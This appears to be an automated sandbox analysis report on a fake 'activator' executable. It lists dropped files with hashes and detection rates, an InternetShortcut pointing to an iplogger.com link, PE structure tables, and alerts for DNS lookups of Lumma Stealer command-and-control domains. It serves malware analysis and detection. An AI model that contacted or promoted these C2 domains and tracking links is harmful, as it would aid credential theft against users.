                                                                                                                                                                                                                                                SHA-512:6230EA9451A4A81EFC6F15FD1A035F0A07D975E800FA84C3ED3F59120D05A8E88B0831BB163BC8F68E8430605D10F2D304B7930E9893BBA2F6B997A369EB4EE1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):21758056
                                                                                                                                                                                                                                                Entropy (8bit):6.539984429791003
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:393216:t48ZWKUwK0e/AKjImUQfTXKvc2V5bI1/lumndlL/bioKr6jBX2bcbkXSTrE3qIsG:BPe9W
                                                                                                                                                                                                                                                MD5:CED63313F64D67F0B624FEFBABDE2B2C
                                                                                                                                                                                                                                                SHA1:913CF60DC59E995D45FD635CAC76AE9976F71BED
                                                                                                                                                                                                                                                SHA-256:6993FB23FC5DC50893133352D6A925D890633241C637361AB86C610A7C41C1F4
                                                                                                                                                                                                                                                SHA-512:8C151FA15F3C8618ECF4BB212F2E4B6CC1CB9E745DC2FDCB44A1426F6FCF21B7AD8954A8752CA275C904B4800848ECCFCCDA655D930E8F26624F336422F21177
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):780424
                                                                                                                                                                                                                                                Entropy (8bit):6.114771861020801
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:hiYH20/vlD+Hu0JXoIaJGSkARc1GFk8vrEalSm3oNma:p/vOXqIawSkQJTlSm3n
                                                                                                                                                                                                                                                MD5:10F43D35F09BC66AC6DBF8B861E6DFAF
                                                                                                                                                                                                                                                SHA1:53DB0949CFDB2F2A0F85AF5BFBB0B6B4FA03FDA5
                                                                                                                                                                                                                                                SHA-256:E5D44473381BC1A7A4BDB598E5162E336CE5C3A8287628FD1A1E92293CA00794
                                                                                                                                                                                                                                                SHA-512:6B5E1C7F87A8D4BD0F300777AA2C4ABA28469B8DE766FF878B11260CA58DEB6ACF47A5E3CDA5697F8154F74E1F3F3BA92C8D0F1A1701159143842ACB3921A12E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1508360
                                                                                                                                                                                                                                                Entropy (8bit):6.500809535302983
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:+Cfhbh3v3mtZDiAQeWj26k41ob2nrZ1rqpegQDJqoZtp22GkmgA9u808jQPEdkrt:+Cfhbh3v3mtEAQrW41obCraeRhy9ou6f
                                                                                                                                                                                                                                                MD5:30DA04B06E0ABEC33FECC55DB1AA9B95
                                                                                                                                                                                                                                                SHA1:DE711585ACFE49C510B500328803D3A411A4E515
                                                                                                                                                                                                                                                SHA-256:A5FE1D8D9CAA2FF29DAFFD53F73A9A4E19C250351B2ABE4FC7B57E60CE67AC68
                                                                                                                                                                                                                                                SHA-512:67790874377E308D1448D0E41DF9DD353A5F63686DF4EB9A8E70A4DA449B0C63A5D3655AB38D24B145AD3C57971B1C6793EA6C5AC2257B6EB2E8964A44AB0F08
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):17110528
                                                                                                                                                                                                                                                Entropy (8bit):6.644998400324389
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:98304:637m86Iero/F6fQHpqIQ+hv5gW738nWHyizf61hbNxTJrtktFE5uUNkVg3N:VpAQIQwv5gW7fHyi8xUFE5uUEg3N
                                                                                                                                                                                                                                                MD5:2706AC6F789E6BDBDA8DAE9D8460FEC8
                                                                                                                                                                                                                                                SHA1:B29D7E5136FC6311FAB7260AC89B8365D31E70B8
                                                                                                                                                                                                                                                SHA-256:E9A3332B33847BADBA4E5D5377367A24C242007992F4F387B06ECA0C18638E54
                                                                                                                                                                                                                                                SHA-512:1A96539469F3E7AD975DB1A59B8D8624972527DCC807B9D0BFE90C99A349D71545D8EDDA64E7E3096E9F721D60852F9168725FD7226FD32626D7544482CDE53A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 62%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:Generic INItialization configuration [InternetShortcut]
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):117
                                                                                                                                                                                                                                                Entropy (8bit):4.786082470547285
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfdCCADM:J254vVG/4xPpuFJQxdCCADM
                                                                                                                                                                                                                                                MD5:D77C01D7DB360878FDDE23DFF64286C3
                                                                                                                                                                                                                                                SHA1:5F8FDF8D870C6364CC93154C964A9C71615F85DB
                                                                                                                                                                                                                                                SHA-256:41E9B16667F5601DA92A5DF14BA84C1DDD15BAE805ED861C3C8E90A9A0FFCCEB
                                                                                                                                                                                                                                                SHA-512:110B92C473DA9FBE416CCC37A29090858AA08662594EFB6D3EC1E39D7E6017A31400ED06848C415D4FD720E8565FD00DADF6A061FE17B47CF680305919B5EAB5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://iplogger.com/1KhnJ4..
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):3.990210155325004
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (47261)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):47262
                                                                                                                                                                                                                                                Entropy (8bit):5.3974731018213795
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                                                                                                                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                                                                                                                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                                                                                                                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                                                                                                                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 55, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPl34tPghkxl/k4E08up:6v/lhP2Pghk7Tp
                                                                                                                                                                                                                                                MD5:F9E849DB41A0968A2ADC20A5ED43BA7F
                                                                                                                                                                                                                                                SHA1:044C142225F57276DC69B7354EB35ACAC92275B7
                                                                                                                                                                                                                                                SHA-256:5BEBBB2D939A43157ED6DCC06918BDB53CD2F9E5A5D6953EF492B5921E83B6EC
                                                                                                                                                                                                                                                SHA-512:A35869F327C767FB8E35A66187FBFF4D6ECAF18918C808AC1D88E37E40B4FF1E51CC4FEABB804F0CB7749ABC2B62C270377EEBACC778C7ED8F30A7647540738C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8ccd8289bc184228/1727964569367/0T9ApzVXXVphPFj
                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ...7............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (47261)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):47262
                                                                                                                                                                                                                                                Entropy (8bit):5.3974731018213795
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:+CWIsQ06lHHhw+r9sygguSwodvdq3VE3XYdze9Ddre9eom1CQWpKexThupcubvCR:uQflHBN9sygg1WViPreEM
                                                                                                                                                                                                                                                MD5:E07E7ED6F75A7D48B3DF3C153EB687EB
                                                                                                                                                                                                                                                SHA1:4601D83C67CC128D1E75D3E035FB8A3BDFA1EE34
                                                                                                                                                                                                                                                SHA-256:96BD1C81D59D6AC2EC9F8EBE4937A315E85443667C5728A7CD9053848DD8D3D7
                                                                                                                                                                                                                                                SHA-512:A0BAF8B8DF121DC9563C5C2E7B6EEE00923A1E684A6C57E3F2A4C73E0D6DD59D7E9952DF5E3CFFFB08195C8475B6ED261769AFB5581F4AB0C0A4CC342EC577C9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):2833
                                                                                                                                                                                                                                                Entropy (8bit):7.876846206921263
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                                                                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                                                                                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                                                                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                                                                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://iplogger.com/favicon.ico
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 32 x 55, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):61
                                                                                                                                                                                                                                                Entropy (8bit):4.068159130770307
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:yionv//thPl34tPghkxl/k4E08up:6v/lhP2Pghk7Tp
                                                                                                                                                                                                                                                MD5:F9E849DB41A0968A2ADC20A5ED43BA7F
                                                                                                                                                                                                                                                SHA1:044C142225F57276DC69B7354EB35ACAC92275B7
                                                                                                                                                                                                                                                SHA-256:5BEBBB2D939A43157ED6DCC06918BDB53CD2F9E5A5D6953EF492B5921E83B6EC
                                                                                                                                                                                                                                                SHA-512:A35869F327C767FB8E35A66187FBFF4D6ECAF18918C808AC1D88E37E40B4FF1E51CC4FEABB804F0CB7749ABC2B62C270377EEBACC778C7ED8F30A7647540738C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.PNG........IHDR... ...7............IDAT.....$.....IEND.B`.
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2833
                                                                                                                                                                                                                                                Entropy (8bit):7.876846206921263
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                                                                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                                                                                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                                                                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                                                                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):7.994982652757958
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File size:25'037'648 bytes
                                                                                                                                                                                                                                                MD5:95d5f32afd610e2e7077bd350eac99c0
SHA1:8fe090a11768454297c17b31fd164a0f2685eca7
SHA256:9e12b0e0ec0101e6fcb4c10e1b5958e534f937dfdc9394b2095b06f29d22867f
SHA512:34086fc321583b194b8414d54e37641cc68c609883e44e7d8a0f784d607f7e72b60f04616858d0dea44c138baa989cc6e1ab80e136605c96aeb5cb63537b4410
SSDEEP:393216:NB/sqD6yukb4fh801Nvx06Xe7gMOvvOAdPM8vhT9LJmCkhdLI+mYBs0GKLsLAEOA:NFJSa4ay/PMOvQyhT9L8htI+DBhlsUE3
TLSH:C347334F5A90146FD45A7DB009227031F1737CC1D3A4AEE903FAFA192AE7E586CA914F
File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,
Icon Hash:070c1c3d5ccf4f38
Entrypoint:0x1400266b0
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x6640972B [Sun May 12 10:17:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:2
File Version Major:5
File Version Minor:2
Subsystem Version Major:5
Subsystem Version Minor:2
Import Hash:e8a30656287fe831c9782204ed10cd68
Instruction
                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x4b1e0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4b214 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x71000 | 0x1f964 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6c000 | 0x2ab4 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x91000 | 0x938 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x460e0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x46180 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3de10 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x3b000 | 0x4a0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x4a4ac | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x398ce | 0x39a00 | 43edabbddfa6948cff2e968fd336a07d | False | 0.5457226138828634 | data | 6.465308419785883 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x3b000 | 0x1118c | 0x11200 | 53297ea4f69cf70feab0538ecef732e2 | False | 0.44722285583941607 | data | 5.215657068009717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x4d000 | 0x1ef5c | 0x1a00 | 08eb45cbc6a0e70bd1c0a96a66c4a6d0 | False | 0.2765925480769231 | DOS executable (block device driver o\3050) | 3.1766622656728773 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x6c000 | 0x2ab4 | 0x2c00 | 703496d6ceba70b1fe234ccc9c454141 | False | 0.4807350852272727 | data | 5.409685184469512 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x6f000 | 0x308 | 0x400 | c445681068e68e0f8df59c5ea517c5e5 | False | 0.2421875 | data | 2.786346435110699 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x70000 | 0x15c | 0x200 | b999e3f72a9a42ebb4d9b8fafa0a18e7 | False | 0.40625 | data | 3.3314534700182197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x71000 | 0x1f964 | 0x1fa00 | e91f632c67ce39b29c85915cd0a6bd9f | False | 0.23395040760869565 | data | 4.816361806689922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x91000 | 0x938 | 0xa00 | c057cd0b29d094da3cebf433be170d6d | False | 0.498828125 | data | 5.228587706357198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x71644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x7218c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x73738 | 0x2655 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9913380209925609
RT_ICON | 0x75d90 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | | | 0.0588844197326393
RT_ICON | 0x865b8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.1115375531412376
RT_ICON | 0x8a7e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.15020746887966804
RT_ICON | 0x8cd88 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.2223264540337711
RT_ICON | 0x8de30 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.45478723404255317
RT_DIALOG | 0x8e298 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x8e520 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x8e65c | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x8e748 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x8e878 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x8ebb0 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x8ee04 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x8efe8 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x8f1b4 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x8f36c | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x8f4b4 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x8f920 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x8fa88 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x8fbdc | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x8fce8 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x8fda4 | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0x8ff64 | 0x250 | data | English | United States | 0.44256756756756754
RT_GROUP_ICON | 0x901b4 | 0x5a | data | | | 0.7666666666666667
RT_MANIFEST | 0x90210 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333

DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T16:09:17.295246+0200 | 2056078 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) | 1 | 192.168.2.6 | 63230 | 1.1.1.1 | 53 | UDP
2024-10-03T16:09:17.308396+0200 | 2056076 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (defenddsouneuw .shop) | 1 | 192.168.2.6 | 62424 | 1.1.1.1 | 53 | UDP
2024-10-03T16:09:17.319367+0200 | 2056074 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deallyharvenw .shop) | 1 | 192.168.2.6 | 49446 | 1.1.1.1 | 53 | UDP
2024-10-03T16:09:17.330985+0200 | 2056072 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (priooozekw .shop) | 1 | 192.168.2.6 | 59874 | 1.1.1.1 | 53 | UDP
